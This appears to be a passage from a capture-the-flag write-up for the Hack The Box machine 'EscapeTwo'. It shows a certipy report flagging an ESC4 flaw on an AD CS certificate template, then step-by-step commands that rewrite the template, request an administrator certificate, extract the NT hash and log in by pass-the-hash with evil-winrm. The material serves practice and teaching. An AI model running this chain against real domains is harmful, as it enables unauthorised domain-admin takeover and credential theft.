            "SEQUEL.HTB\\Domain Admins",
            "SEQUEL.HTB\\Enterprise Admins"
          ],
          "1": [
            "SEQUEL.HTB\\Administrators",
            "SEQUEL.HTB\\Domain Admins",
            "SEQUEL.HTB\\Enterprise Admins"
          ],
          "512": [
            "SEQUEL.HTB\\Authenticated Users"
          ]
        }
      }
    }
  },
  "Certificate Templates": {
    "0": {
      "Template Name": "DunderMifflinAuthentication",
      "Display Name": "Dunder Mifflin Authentication",
      "Certificate Authorities": [
        "sequel-DC01-CA"
      ],
      "Enabled": true,
      "Client Authentication": true,
      "Enrollment Agent": false,
      "Any Purpose": false,
      "Enrollee Supplies Subject": false,
      "Certificate Name Flag": [
        "SubjectRequireCommonName",
        "SubjectAltRequireDns"
      ],
      "Enrollment Flag": [
        "AutoEnrollment",
        "PublishToDs"
      ],
      "Extended Key Usage": [
        "Client Authentication",
        "Server Authentication"
      ],
      "Requires Manager Approval": false,
      "Requires Key Archival": false,
      "Authorized Signatures Required": 0,
      "Validity Period": "1000 years",
      "Renewal Period": "6 weeks",
      "Minimum RSA Key Length": 2048,
      "Permissions": {
        "Enrollment Permissions": {
          "Enrollment Rights": [
            "SEQUEL.HTB\\Domain Admins",
            "SEQUEL.HTB\\Enterprise Admins"
          ]
        },
        "Object Control Permissions": {
          "Owner": "SEQUEL.HTB\\Enterprise Admins",
          "Full Control Principals": [
            "SEQUEL.HTB\\Cert Publishers"
          ],
          "Write Owner Principals": [
            "SEQUEL.HTB\\Domain Admins",
            "SEQUEL.HTB\\Enterprise Admins",
            "SEQUEL.HTB\\Administrator",
            "SEQUEL.HTB\\Cert Publishers"
          ],
          "Write Dacl Principals": [
            "SEQUEL.HTB\\Domain Admins",
            "SEQUEL.HTB\\Enterprise Admins",
            "SEQUEL.HTB\\Administrator",
            "SEQUEL.HTB\\Cert Publishers"
          ],
          "Write Property Principals": [
            "SEQUEL.HTB\\Domain Admins",
            "SEQUEL.HTB\\Enterprise Admins",
            "SEQUEL.HTB\\Administrator",
            "SEQUEL.HTB\\Cert Publishers"
          ]
        }
      },
      "[!] Vulnerabilities": {
        "ESC4": "'SEQUEL.HTB\\\\Cert Publishers' has dangerous permissions"
      }
    }
  }
}%    

According to the json report the Cert Publishers has a Full Control, Write Owner, Write Dacl, Write Property principals and these permissions is vulnerable to ESC4 attack.

Shell - Administrator [ ESC4 Attack ]

ESC4 is an attack vector that exploits weak access control lists (ACLs) on Active Directory Certificate Services (AD CS) certificate templates. This attack allows a user to modify the configuration of a certificate template, potentially leading to privilege escalation within a domain. You can find more depth details about the ESC4 attack in below hacktricks article.

AD CS Domain Escalation - HackTricksbook.hacktricks.wiki

1

Select the vulnerable template [ DunderMifflinAuthentication ] by overwriting the configuration using certipy to make it vulnerable.

certipy template -k -template DunderMifflinAuthentication -target DC01.sequel.htb -dc-ip 10.10.11.51 -save-old

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'

2

Request a certificate for administrator.

certipy req -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' -u 'ca_svc' -ca 'sequel-DC01-CA' -target 'DC01.sequel.htb' -ns 10.10.11.51 -dns 10.10.11.51 -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn 'administrator@sequel.htb' -debug 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'DC01.sequel.htb' at '10.10.11.51'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.51[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.51[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with multiple identifications
    UPN: 'administrator@sequel.htb'
    DNS Host Name: '10.10.11.51'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_10.pfx'

3

Request Administrator TGT.

certipy auth -pfx administrator_10.pfx -dc-ip 10.10.11.51

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
    [0] UPN: 'administrator@sequel.htb'
    [1] DNS Host Name: '10.10.11.51'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

Login via winrm using the above hash through evil-winrm.

evil-winrm -i 10.10.11.51 -u 'administrator' -H 7a8d4e04986afa8ed4060f75e5a0b3ff
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

The root.txt file contains the user flag which is located in the Desktop directory 🎉

Proof of Concepts

The below video provides the PoC of EscapeTwo machine.